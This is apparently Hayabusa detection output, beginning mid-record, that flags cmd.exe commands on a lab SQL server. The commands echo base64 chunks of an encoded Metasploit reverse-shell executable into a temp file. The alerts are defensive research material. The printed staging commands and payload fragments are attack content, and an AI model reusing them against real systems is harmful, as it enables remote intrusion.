BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo SBK5iQKLRdCLEBL7phCLeBCF9o1MMgHmgAAAAImNEHQwi8fR+u3CCYlF2YrDJD+JTdeSFQTXiAGLw7kGsGUAnNS+AMOLTfiL2ItF/E6L+nXQi1UMCtiIWf/+AoUuiUX8D4Wy/v//X6pbi+Vd0hAAX164eBEBAFtF5V3CPAB0kbgWAHEAW4vlXZoQAJCQkJCQkBWQ7Y+QgJBV5OyL3giD6ETkEP+zDDVAAMcAsScAADPAXcN9RRSLTRAvVVBQUVJMFFcAAIPEDF3DkJCQkJCQkJCQkJCQkJCQus/s3UUQi00Mg+0QcxD/kXjBQADHeBwAswAzwP3DU1ZbdQhXvwQAawCKFkY8Y4hFEHYai0UQu2QAUQAlCgCkAJn3+wQwiLwQiAFB6wQ8REMXi0UQuwoAAAA1/wBwAJn3+wQwiAFBisIEMIgBycYBLkFPdbWLRQxfXsZBvBZbXcNVi+yD7AwJSYt1d1eDPgB3EYsGAAAAAIzPM8Bbi+VdwgwAi10Ii0MY9sQCdGV/QwyFWXXpiwNqFFAV/+jQm2n/i0+JOIB4BInTCIkE81dXNol4IFeJvFf/FaDA1wCLUwyJ0mHiQwyLSMqFyXUlizW0wLxj/9aFwHUJX15bi+VdwgwA/9ZfwgCA/AoAW4vlhcIMAOpDMIOfMDvHi0UMdCiKmDCICIsWQEqJFol7MIsOiUUMhcl1Ecf9ActRAF9eM8Bbi+VdwgyqikssVzcPhDUBAACLU1iLPlKJ3EuJ5/jonaJ2/4PbSAF1LVOBkQNrADPJiUUIOxh0T4tDWFDomPP//4tFCF9eW4vlXcIMAIlLPIlLSIlLRMdFCAAAAFR8A4t9+IX/GIadAHgA4Us8OkNEO8hyN4tDQItLOO5VGlIgUfXo6gAAAItNzzuXB8QQO/iJRQh0ZFX4UItDVAPxiUtEE8KJc1CJ2FQEUzyLU4SLQ0Q4wjn4dwKLoouBOKdE/ET4A/LUSMHpAodTi8qPVfyD4QMD3fOkAHMsdE34bPAryItFCIlbdyZ1EPpVpoWmiWH4D4S8////Ew49JxEBADBnx0PNAdsAWHFF/ItNDK3BiQbsB8dFCAAnAACLQ1iUbQ3z//8XRQhfBFvD5V02XQCLFitNDFFSUGjoMwAAAIMkED1+EQF4iUUIVQfHQygBPwAAi0UmX4kGi0UIXluL5V3CDACVkJCQ8pCQC/+QkJCQkFUQGIuLyggci30Qi0YQi04UC8HHRRIAAAAAdXOKRgiE7HTVi1YEjSgIagBRagBqAGoA3v8VDMBAAB3GdTWLNZjAQAD/mIXAdQmLTRRfXg9CvcP/1gWA/AoAPe12TgBrBbh+PgGAi5QUX16QAQCsABdd6IvqCIXAdQ6LLhRfXokCuAtmAABdw+T4dgJm+ItGDIVDdCOKTgiZyXUci05QiUgIi0ZQi70nuSAAAADo3wbOAItWDImS2PBGDBPwDFONTRBQi0Y/UVeRUP8V>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo i1QkEJLY99oV2OOJZyQUiVQkOrxEJBwLwH0Ufr50JBj32Pfag9gAiUQkHIlnJBgLwHUYi0y5GIsFJJgz0veIi9gqRCR09zOLs3FBie2LTCR+i0EkFC6yJCXR614h0dvR2AvbdfT38Yvw92QkoovIi0QkGPfmA9ELDjtUJBR30HIHO0R3+HYBTjPSi79PjQf32vdGHdoAW15fwhAAVYvsav9oYMf8AChIuUAAd6EAAAAAUGSJJQAAAADlGiBTVleJZeiD6zgAagH/FdCrQN1+BQ1UQFwAlYMNWEBBAP+3FdTAQH6LDZgLQQCJCP8V2MBAAIsNSAtBAIkIodwOQACLAKMlQEEA6J/nAACDMVANQQAAdQyJ1LlAAP8V4MBCAFnocAKTAGgMhUAARyHQbgDoWwIAAKGQXV4AiUXYjR7YUP81jAtBAI1F4FCNRdSDjUXke/+f6MBAMWjr0EAAaABf/OvoWgIAAP8VzcBAAIth4Ilm/3Xg/3XU/3Xk6ONYk9NBxDCpRdxQ/5S4wUAAi0Xsi1yLCYlN0FBR6OsBlwDHWQOLZej/ddD/FfTAQADMhczMzN3HVzMyi0SIEAvASBRIi+EkYffY99qD2ACJRCQQiXUkmpVEJBgLwH0TUVQkFNnY99qD2AArRCQYiVQkFAtedfaLTMoUi0QkEOXa9/ELRCQM9/GdnzPST3lO61OL2ItMJBSLVCQGi0QkDNGj0dnRc9HYC9t19Pfxi8j3ZCQYkfdkvBQDxsMOO1QkWXcIcr47RCQMdv/BRHwUm1ReGCsKdgwbVCQQT3kH94T32IPagNlbwhAAzMzMzMzMIKigzMwtzMyAp0BvFoD5a3MGD6/Q0/obi0XBSYSA4RXT+MPB+h+LwtPMzMzMzMzMzMzMzMxF28xRPQAQAACNOyTochSB6QCkADQtABAwlNF5PQAQAABz7CvIi7KF14vhiwiLrgRQXcyAbkBzFYD5IHMGD8fCbTPDhtAzwIDh0NPiwzPAM9LDzFNWi8UkGAtidRiLTAgUi0QkEDrS98qL2M5EJAz38YvT67aLyFBcJBSLVCQQi0QkDNPp0dvR6tF9C8l19PfzA/D3ZCQYi8iLRCQUouYD0XIOO7WgzXcIcgc7RCQMdgFOPtKLxuNbwhAAzB/MzHPMzMyA+UBzFYD5oHMGDzXQ03PDiw7O0oBBH9NPwzPAM9LDzP8l/MBAAP8l8MBAAP9k5MBAAGgAAANNaAAMAR1tDQAASVmZdDPAw8P/Jcy+WQD/JYTB8gDMzMzMzMjMzMzMzMz/0szBQM8AAAAAAEMAAEIAAAAINAAAANEAAMcAAD4AAAAAAAAAPwAAAOUAfQAAACmdAAAAAJQ4xQAAAP0AKwAAAAAAAACXAAAAAACYAABMAAAAcgAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAUAAAA7QC1AAAAYVEcAAAAewAAAAAAtgAAAPoAAAARAABN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AADBAAAAAAAAAAAAAAAAAAAA2pcWAFUAAAAAAAAWAAAAAACGAABWAAASAABIAAAEAAAAAAAAAAAAAAAAANQAAADkAAAAALgAuiMAAAAAAOQAAACYAO8AAAAAAAAAAAAAAAAAAAAAAAAAAACKAAAAAAAAAAAgLQAAdwAAAAAAAAAAAAAAAGsAAAAAAI0AAAAAAGsAAADgAAAAAAAAAABYAAAAAO2gAAAA3gAAAAAAVSIAAABPAAAAXgAAAAAAAAAAAAAAAAAAAAAAAAB/1wCEADwAAAAAAJ0AAAAAALkAAAA+rjcAAAAAAAC0bwAAAACLAAAAAAAAAAAAAAAAAAB8AJ8AAAAjBQAAUAAAAAAAoAAAAAAAAAAAAAAAAAAAAGD0AAAAAADgAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAA8wAAAAAAAAAATgAAAAAAxmsAAAAAPwAAAAAAAAAAAFQAAABSDAAAp1oAAAAAAAAAKwAAAJMAnQDkAADRAAAhAAARAAAAAAAAAFwAXQCjpAAAAAAAAOsAAAAAAAAAAABLAAAAAAAAAAAAAAAAAAAOAAAhGhZPAAAAjM8AAHDPAAAAAAAAUs8AAEbPAAA6zwAAKs8AABjPAAAIzwAA8s4AAN7OAADGzgAAus4AAKrOAACSzgAAes4AAF7OAABOzgAAQM4AAPrLAAAKzAAAJMwAAD7MAABMzAAAXswAAGrMAAB0zAAAhswAAJrMAACyzAAAwMwAANrMAADyzAAADM0AACbNAAA+zQAAYM0AAGjNAAB6zQAAis0AAKDNAACwzQAAwM0AANLNAADgzQAA7s